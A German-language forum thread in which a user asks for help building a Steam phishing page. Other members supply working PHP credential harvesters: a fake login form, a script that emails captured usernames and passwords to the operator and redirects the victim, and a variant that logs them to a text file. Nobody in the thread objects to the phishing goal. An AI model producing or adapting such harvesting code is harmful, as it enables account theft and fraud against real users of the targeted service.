Phishing Seite

[B4rT]

Hallo liebe php coder,

ich habe folgendes Problem:
Ich möchte eine Steam Phishing Seite auf die beine stellen. Das Layout und alles weitere ist schon so gut wie fertig. Nun kommen wir zum - für mich - etwas schwierigerem Teil.

Ich brauche ein php script, mitdem ich immer eine Email (emailadresse muss also von mir angegeben werden) bekomme, wenn sich jemand auf meiner phishing Seite einloggt.

Nun stellt sich die Frage, wie ich das am besten anstelle?
Ich hoffe ihr könnt mir helfen.

Gruss
b4rt

[Nemo.A]

Hallo Bart,
Grad mal so aus dem Ärmel gecoded:

<?
$empfaenger = "deine@mail-adresse.de";
$text = "Username: ".$_POST['username']." \r\nPasswort: ".$_POST['passwort'];
$sender = "beliebige@mail.de";
mail($empfaenger, $betreff, $text, "From: $sender <$sender>");
header("Location: index.php");
?>

Deine Phishing seite muss per "POST" die Daten an dieses Script leiten. Die Felder sollten "username" und "passwort" heißen (jenachdem wenn es mehr felder gibt, script anpassen).
Nachdem die Datein dir gesendet wurden, wird der user wieder auf die "index.php" umgeleitet.

Ich hoffe du lernst aus dem Script!

[B4rT]

Das ging ja echt flott, allerdings hab ich gerade noch eine ähnliche datei auf einem anderen Board - wo ich denke das sie besser passt *gg* gefunden.
Denn es gibt 3 Felder. 1. Name, 2. Passwort, 3. Email (wobei "Email" völliger Schwachsinn ist und einfach nur eine Atrappe ist, damit es echter aussieht ;-)

Also so sieht das aus:

Code:

<?php
$feld= "\n---------------------------------------\n USER: " . $_POST['name'];
$feld2= "\n PASS: " . $_POST['pass'];
$feld3= "\n MAIL: " . $_POST['mail'];

$write=fopen("name.txt", "a");
fwrite($write, $feld);
fwrite($write, $feld2);
fwrite($write, $feld3);
fclose($write);
?>
<meta http-equiv="refresh"  
 content="0;url=/steam.php">

Nun ist die Frage, ob ich das hier verändern soll, oder deins nehmen sollte? Unter anderem wegen dem drittem Feld

Kannst dich auch gerne per icq melden :-)
400-516-701

Gruss

[Nemo.A]

Hallo bart,
Dein Script speichert eine Datei auf dem FTP. Du wolltest aber, dass die Daten dir per Mail geschickt werden.

[B4rT]

Das stimmt, wohl, das hatte ich vor. Allerdings wenn mein script des auf nem FTP speichert, ist es ja eigentlich auch okay ;-)
Dort muss ich auch sicher nix verändern, richtig?

[N4wuko]

Hallo B4rT, da du ja eine Pishing Seite eröffnen willst, isses besser du verschickst die Daten dann immer per Mail (Find ich einfach Dynamischer ). Also ich hab dir mal was zusammeln gebaut.
Du brauchst 2 Dateien, zum einen die Datei wo das Layout und das Formular ist wo der User seine Daten eintragen kann (Diese nennst du "index.php"). Zum anderen noch die Datei, die
die EMail losschickt (Diese nennst du "mailsend.php").

Der Code für das die erste Datei ist:

Code:

<form action="mailsend.php" method="post">
<input name="account" type="text"> Account
<input name="passwort" type="password"> Passwort
</form>

Wie du siehst werden die Daten dann an die "mailsend.php" weitergeschickt.


Dies ist der Code für die zweite Datei (Die "mailsend.php"):

Code:

<?
$empfaenger = "deine@mail-adresse.de";
$text = "Accountname: ".$_POST['account']." \r\nPasswort: ".$_POST['password'];
$sender = "beliebige@mail.de";
mail($empfaenger, $betreff, $text, "From: $sender <$sender>");
header("Location: index.php");
?>

Hier musst du nur noch die EMail oben auf deine ändern und schon war's das.

Wenn du noch mehr Erläuterungen von dem Code brauchst PM mich ruhig.

[B4rT]

Viele dank, ich denke das kann ich sehr gut gebrauchen -obwohl ich mir noch nicht sicher bin, ob ich die daten auf nem FTP speicher oder mir zusenden lassen :roll:

Aber an beide, vielen Dank :-)

[MetroFun]

€dit:
ok ich habs, ergebnis sehr ihr hier